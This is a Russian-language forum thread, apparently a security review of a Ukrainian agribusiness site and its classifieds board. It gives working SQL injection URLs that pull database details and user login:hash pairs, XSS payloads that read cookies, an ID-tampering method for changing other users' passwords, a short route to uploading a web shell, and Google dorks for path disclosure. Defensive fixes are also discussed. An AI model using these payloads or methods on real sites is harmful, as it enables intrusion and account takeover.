_http://agrobiznes.com.ua

Сегодня заметил что в конец файла index.php был дописан невидимый слой с ссылками. А я то думаю почему меня яндекс не индексирует..

П.С. Пароли храню не в фтп-клиенте

1. при регистрации картинка с кодом подтверждения имеет вид
<img src="http://agrobiznes.com.ua/classes/img.php?r=2957"/>
где явно видна цифра, которая будет отображена на картинке. в таком случае смысла использовать код подтверждения нет, любой отпарсит.

2. _http://agrobiznes.com.ua/phpmyadmin/ может как-то переименовать или переместить в другое место???

3. при редактирование личных данных на страницах редактирования пароля, редактирования личных данных, редактирования фотографии, форма в хидден поле передает айди юзера. можно изменять из-под своего аккаунта данные любого пользователя.

Раскрытие путей

http://agrobiznes.com.ua/classes/sm_katalog.php
Fatal error: Call to a member function register_function() on a non-object in /home/[...]/classes/sm_katalog.php on line 81

SQL-injection

kreativ_uaagro@localhost:kreativ_agro:5.0.37-standard
http://board.agrobiznes.com.ua/ru/obl-20518.html?id=0'+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,concat_ws(0x3a,user(),database(),v ersion()),17,18,19/*
Тут же можно достать логины и хеши. Первый же хеш очень легко расшифровывается.
http://board.agrobiznes.com.ua/ru/obl-20518.html?id=0'+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,group_concat(concat_ws(0x3a,login, pass)),17,18,19+from+users/*
Далее:
http://board.agrobiznes.com.ua/ru/pages/80/?kategory=&rub='+and+1=0/*&subrub=&country_name=&region_name=&city_name1=&city_name2=&flag=bygor&search=&do=filter

XSS

http://board.agrobiznes.com.ua/ru/?do=filter&lng=ru&flag=bygor&kategory=0&rub=0&subrub=0&country_name=0&qwqwkod=&search=%22%3E%3Cscript%3Ealert%28document.cookie%2 9%3C%2Fscript%3E&do2=
зы: искать дальше не очень охото, тк сайт подтормаживает :(

Скажите а можно через эти уязвимости залить шел или подредактировать скажем индексный файл?
И если да то как?

И если да то как?
Через SQL-иньекцию найти пароли от phpmyadmin, которые ты не спрятал, и от туда залить шелл.
Найти пассы через SQL-иньекцию от админики и через админку залить шелл.

1) Активная XSS на странице подачи объявления.
Слабая фильтрация в заголовке объявления и в тексте объявления.
_http://board.agrobiznes.com.ua/ru/obl-20535.html
2) Еще одна XSS
_http://board.agrobiznes.com.ua/ru/?do=add_ok&obl_id=<script>alert('XSS')</script>
3) С помощью перехвата пакетов можно легко сменить пароль пользователя. Достаточно знать его id.
Алгоритм:
Зайти под своим аккаунтом.
Перехватить пакет при смене своего пароля и изменить id, который открыто передается за компанию с логином и паролем.
Проверял - работает.

Ну общая картина мне ясна:
от sql_injection - пройтись по входящим переменным и хорошо их отфильтровать, поприсваивать типы, длинну данных и т.д.

XSS - коретно вставлять\выбирать данные из таблиц. Экранировать данные + htmlspecialchars

Как быть с пекредающимся id при сохранении данных юзера? Как можно исправить этот баг?
Может хранить id в переменной $_SESSION ?

* Раскрытие путей

http://agrobiznes.com.ua/classes/sm_katalog.php
Код:

Как Вы узнали этот путь?

Как быть с пекредающимся id при сохранении данных юзера? Как можно исправить этот баг?
Может хранить id в переменной $_SESSION ?

как вариант :) тут в соседней теме мыло и пароль в куки засовывают, т.ч. смотри сам. :D

Раскрытие путей:
_http://agrobiznes.com.ua/board/classes/sm_board.php
Fatal error: Call to a member function register_function() on a non-object in /home/[...]/classes/sm_board.php on line 131
Как Вы узнали этот путь?
Например: Вбиваем в Google:
site:agrobiznes.com.ua Warning
или
site:agrobiznes.com.ua on line
И смотрим выдачу.